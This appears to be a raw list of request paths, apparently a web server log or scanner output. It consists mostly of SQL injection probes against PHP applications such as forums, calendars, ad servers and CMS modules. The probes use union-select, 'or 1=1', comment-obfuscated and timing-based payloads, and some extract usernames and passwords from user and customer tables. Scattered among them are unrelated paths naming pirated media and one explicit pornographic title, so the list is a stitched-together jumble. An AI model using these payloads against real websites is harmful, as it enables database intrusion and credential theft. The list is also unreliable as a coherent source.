/examples/jsp/colors/disp_album.php?id_album=0+or+1=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908887,1,306453672--

/examples/jsp/sessions/event_view.php?eid=34 union select 266467508

/www/delivery/ac.php?bannerid=-490+or+1=1

/examples/jsp/jsp2/el/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,2108362363--

/examples/jsp/cal/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/examples/jsp/num/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/recordings/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --

/forum.php?forum=-1 union select null,123456,null,null,null,null--

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/colors/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/phpmyadmin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/cgi-bin/www/delivery/ac.php?bannerid=-143+or+1=1

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,216587000840,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,992502263288,4,5,6,7,8,9,10,11--

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,580577722--

/event_view.php?eid=34 union select 116183572

/examples/jsp/colors/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,411244222371,4,5,6,7,8,9,10,11--

/examples/jsp/jsp2/jspx/disp_album.php?id_album=0+or+1=1

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1332010414,1674856471 --

/examples/jsp/jsp2/jspx/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1357918579--

/index.php?page_id=-1&news_id=-1/**/union/**/all/**/select/**/1234,23456,concat(111222,0x3a,0x3a,333222),45678,5,6/*

/forum.php?channel=0 union select * from force_mysql_table_error

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919205,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2015576020--

/examples/jsp/jsp2/jspx/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/examples/jsp/jsp2/el/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,288784246 --

/cacti/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/event_view.php?eid=34 union select 1120685664

/examples/jsp/jsp2/el/event_view.php?eid=34 union select 1298640173

/cacti/forum.php?id_article=1&id_forum=-1/**/union/**/select 1339339120--

/index.php?act=sm_window&page=event&day=-1 union select 1,1331905208,683242946 --

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/phpmyadmin/forum.php?id_article=1&id_forum=-1/**/union/**/select 216160089--

/cgi-bin/event_view.php?eid=34 union select 1357087109

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 833694708--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919224,4,5

/index.php?act=sm_window&page=event&day=-1 union select 1,1331908736,1691970526 --

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1566051854--

/examples/servlets/servlet/forum.php?id_article=1&id_forum=-1/**/union/**/select 1027584559--

/en-us/account/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --

/event_view.php?eid=34 union select 2017746212

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904243,1,146623801--

/examples/jsp/checkbox/www/delivery/ac.php?bannerid=-52+or+1=1

/examples/jsp/jsp2/el/disp_album.php?id_album=0+or+1=1

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5

/examples/jsp/jsp2/el/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/phpmyadmin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,658318363702,4,5,6,7,8,9,10,11--

/cacti/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/en-us/account/event_view.php?eid=34 union select 397166177

/phpmyadmin/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1528990877 --

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1763125680--

/examples/jsp/jsp2/el/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/examples/jsp/sessions/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/recordings/forum.php?id_article=1&id_forum=-1/**/union/**/select 1350546520--

/manager/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1295147279--

/cgi-bin/www/delivery/ac.php?bannerid=-799+or+1=1

/manager/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1924725202--

/manager/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/cgi-bin/event_view.php?eid=34 union select 1325837387

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919205,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/www/delivery/ac.php?bannerid=-413+or+1=1

/www/delivery/ac.php?bannerid=-619+or+1=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1187747366,616507462,1,1,1,1,1--&blogid=1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/french revolution parts 3 and 4/

/en-us/account/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/num/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cgi-bin/www/delivery/ac.php?bannerid=-116+or+1=1

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5

/main.php?stuff=1417058040 and 1=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,393988880--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919012,4,5

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332009306,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/cal/forum.php?id_article=1&id_forum=-1/**/union/**/select 352155233--

/examples/jsp/colors/www/delivery/ac.php?bannerid=-709+or+1=1

/en-us/account/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1106092020--

/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 874065335--

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010411

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1576648427--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/chuzzle deluxe  and 15 others arcades pc game from www/

/benchmark-timer/

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/sessions/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--&blogid=1

/examples/jsp/cal/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,058868743975,4,5,6,7,8,9,10,11--

/examples/jsp/colors/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/magic engine full version and 33 games/

/examples/jsp/sessions/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,038681154549,4,5,6,7,8,9,10,11--

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1332009308,4,5

/manager/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/event_view.php?eid=34 union select 1518430108

/category.php?id_category=-1/**/union/**/select/**/123456,123456,2,3/*

/manager/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1281604996--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/forum.php?id_article=1&id_forum=-1/**/union/**/select 2114666873--

/cacti/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904243,1,184408544--

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1957070344--

/examples/jsp/checkbox/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/examples/jsp/error/disp_album.php?id_album=0+or+1=1

/www/delivery/ac.php?bannerid=-467+or+1=1

/examples/jsp/checkbox/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1261592363--

/index.php?act=sm_window&page=event&day=-1 union select 1,1332010400,1221421857 --

/examples/jsp/colors/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010411

/en-us/account/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,371410086205,4,5,6,7,8,9,10,11--

/ps2-king of fightters 2000 and 2001 pal fulldvd/

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 663157054,2,24321334,4,5,6,7,8,9,0,1,2,3 --

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010419,1,555867881--

/examples/jsp/checkbox/disp_album.php?id_album=0+or+1=1

/examples/jsp/cal/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/examples/jsp/colors/event_view.php?eid=34 union select 982331779

/examples/jsp/sessions/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,028709098171,4,5,6,7,8,9,10,11--

/cacti/disp_album.php?id_album=0+or+1=1

/examples/jsp/jsp2/jspx/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/www/delivery/ac.php?bannerid=-969+or+1=1

/examples/jsp/sessions/disp_album.php?id_album=0+or+1=1

/index.php?act=sm_window&page=event&day=-1 union select 1,1331904453,478751466 --

/examples/jsp/sessions/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/examples/servlets/servlet/event_view.php?eid=34 union select 238075270

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/cal/event_view.php?eid=34 union select 1808914084

/recordings/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,977703567678,4,5,6,7,8,9,10,11--

/en-us/account/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1934483263--

/index.php?page=details&prod=1 union select 1,concat(char(65,99,85,110,69,116,73,120,32),password),3,loginname,5,6,7,8 from customer

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,266652800,1186686792,1,1,1,1,1--&blogid=1

/examples/jsp/cal/disp_album.php?id_album=0+or+1=1

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201

/phpmyadmin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1743323702--

/examples/jsp/jsp2/jspx/event_view.php?eid=34 union select 1813972141

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/forum.php?id_article=1&id_forum=-1/**/union/**/select 953866705--

/manager/www/delivery/ac.php?bannerid=-915+or+1=1

/examples/servlets/servlet/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,932959506763,4,5,6,7,8,9,10,11--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/phpmyadmin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/event_view.php?eid=34 union select 1132616552

/examples/jsp/num/www/delivery/ac.php?bannerid=-443+or+1=1

/examples/jsp/jsp2/el/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/cacti/index.php?act=sm_window&page=event&day=-1 union select 1,1331905207,812848358 --

/examples/jsp/cal/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/news radio season 1 and 2 part 2/

/examples/jsp/checkbox/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1272619554--

/examples/jsp/checkbox/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1331141897--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/live8 3rd july 2005 - bbc radio 1 and 2 coverage/

/cacti/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1

/en-us/account/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,967707209 --

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,883621484594,4,5,6,7,8,9,10,11--

/examples/jsp/checkbox/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,098209450608,4,5,6,7,8,9,10,11--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010406,4,5

/phpmyadmin/index.php?act=sm_window&page=event&day=-1 union select 1,1331923203,951161700 --

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,459253847947,4,5,6,7,8,9,10,11--

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/www/delivery/ac.php?bannerid=-339+or+1=1

/search.php?category=-1/**/union/**/select/**/1234567890/**/from/**/users/*

/phpmyadmin/event_view.php?eid=34 union select 2142909880

/en-us/account/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904228

/phpmyadmin/event_view.php?eid=34 union select 242634325

/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,1387599822 --

/cgi-bin/www/delivery/ac.php?bannerid=-958+or+1=1

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904243,4,5

/spt--forumtopics.php?forumid=-9 union select null,null,null,1332009308,4,5

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/chyna doll - part 1 and 2/

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 854943738,2,566710091,4,5,6,7,8,9,0,1,2,3 --

/phpmyadmin/event_view.php?eid=34 union select 488094895

/examples/jsp/checkbox/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/girls in the garage 1 and 2/

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1122101471--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,653954551,528677520,1,1,1,1,1--&blogid=1

/examples/jsp/error/index.php?act=sm_window&page=event&day=-1 union select 1,1331904453,466614507 --

/recordings/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919011,1,799611287--

/enterprise 2x07 and 2x25/

/en-us/account/spt--forumtopics.php?forumid=-9 union select null,null,null,1331909422,4,5

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/www/delivery/ac.php?bannerid=-704+or+1=1

/main.php?stuff=2040844887 and 1=1

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/num/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1977313023--

/examples/jsp/jsp2/el/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/and 1 mix tape vol/

/encylopedia of space program and 3d nasa world globe/

/examples/jsp/error/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/equinibrium - benchmark ep/

/phpmyadmin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331919007,369341244 --

/phpmyadmin/www/delivery/ac.php?bannerid=-262+or+1=1

/manager/forum.php?forum=-1 union select null,123456,null,null,null,null--

/examples/jsp/jsp2/jspx/event_view.php?eid=34 union select 1013998747

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1332008334,1844807348 --

/1 lucky guy and 2 girls/

/examples/jsp/checkbox/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/num/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cgi-bin/event_view.php?eid=34 union select 1857256540

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1181465000--

/phpmyadmin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 502889442--

/manager/disp_album.php?id_album=0+or+1=1

/cgi-bin/www/delivery/ac.php?bannerid=-691+or+1=1

/forum.php?id_article=1&id_forum=-1/**/union/**/select 379367425--

/examples/jsp/num/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202

/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-758+or+1=1

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/cacti/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,1110520519 --

/examples/jsp/num/event_view.php?eid=34 union select 2098077724

/cgi-bin/disp_album.php?id_album=0+or+1=1

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1691770536--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/jsp2/jspx/forum.php?forum=-1 union select null,123456,null,null,null,null--

/manager/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1177449886 --

/examples/jsp/num/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/examples/jsp/jsp2/jspx/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/jspx/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,326778972936,4,5,6,7,8,9,10,11--

/phpmyadmin/www/delivery/ac.php?bannerid=-411+or+1=1

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,207893861361,4,5,6,7,8,9,10,11--

/www/delivery/ac.php?bannerid=-422+or+1=1

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1380335325--

/en-us/account/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,945296405485,4,5,6,7,8,9,10,11--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1187747366,616507462,1,1,1,1,1--&blogid=1

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1126849470,1437216392,1,1,1,1,1--&blogid=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,1237129448--

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332009306,1,1,1,1,1,1,1--&blogid=1

/en-us/account/www/delivery/ac.php?bannerid=-683+or+1=1

/manager/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,796815779882,4,5,6,7,8,9,10,11--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908729

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1637888505--

/examples/jsp/sessions/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/index.php?act=sm_window&page=event&day=-1 union select 1,1331908875,1422321132 --

/xbox-metal slug 4 and 5 usa iso/

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 602621340--

/examples/servlets/servlet/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,982436616852,4,5,6,7,8,9,10,11--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,117703567 --

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908740,4,5

/benchmark-guides/

/recordings/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--&blogid=1

/examples/jsp/checkbox/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/recordings/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/www/delivery/ac.php?bannerid=-706+or+1=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908740,1,702691093--

/examples/jsp/sessions/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/barrett uw lecturer and 911/

/examples/jsp/cal/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1229259727--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331909422,4,5

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202

/recordings/www/delivery/ac.php?bannerid=-586+or+1=1

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,896106306027,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/jsp/error/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/www/delivery/ac.php?bannerid=-941+or+1=1

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1421387166 --

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--&blogid=1

/cosi fan tutte - mozart k588 acts 1 and 2 192kbs/

/examples/jsp/colors/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,792148439 --

/manager/www/delivery/ac.php?bannerid=-317+or+1=1

/ewebquiz.asp?quizid=1 or 1=1

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1415485766,1622819751,1,1,1,1,1--&blogid=1

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 751176322--

/examples/jsp/sessions/forum.php3?id_article=1&id_forum=-1/**/union/**/select 993854877--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/colors/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/examples/jsp/jsp2/el/www/delivery/ac.php?bannerid=-444+or+1=1

/examples/jsp/cal/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,689034044--

/examples/servlets/servlet/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/prison tycoon and 17 other great arcade pc game from www/

/cacti/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/phpmyadmin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,513568451425,4,5,6,7,8,9,10,11--

/index.php?do=newspost&id=-1 union select 1111,2222,3333,4444,5555,6666,7777,8888

/sex 6 min orgy group of 3 guys and 4 girls in evening dresses fucking licking sucking fingering oral adult xxx porn movie/

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1484566338--

/examples/jsp/checkbox/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,91065148 --

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904231,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,61785070--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1130652008--

/forum.php?id_article=1&id_forum=-1/**/union/**/select 204531547--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 --

/event_view.php?eid=34 union select 197529421

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,194724896947,4,5,6,7,8,9,10,11--

/iron maiden - bonus cd 3 4 and 5/

/index.php?act=sm_window&page=event&day=-1 union select 1,1332010414,899908858 --

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1305074935,281030825,1,1,1,1,1--&blogid=1

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/colors/forum.php?id_article=1&id_forum=-1/**/union/**/select 1040450576--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/main.php?stuff=(6105-benchmark(1,0x53454c454354204e554c4c)+44498)

/phpmyadmin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,823667643--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,936804977235,4,5,6,7,8,9,10,11--

/manager/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1950269631 --

/event_view.php?eid=34 union select 2097552847

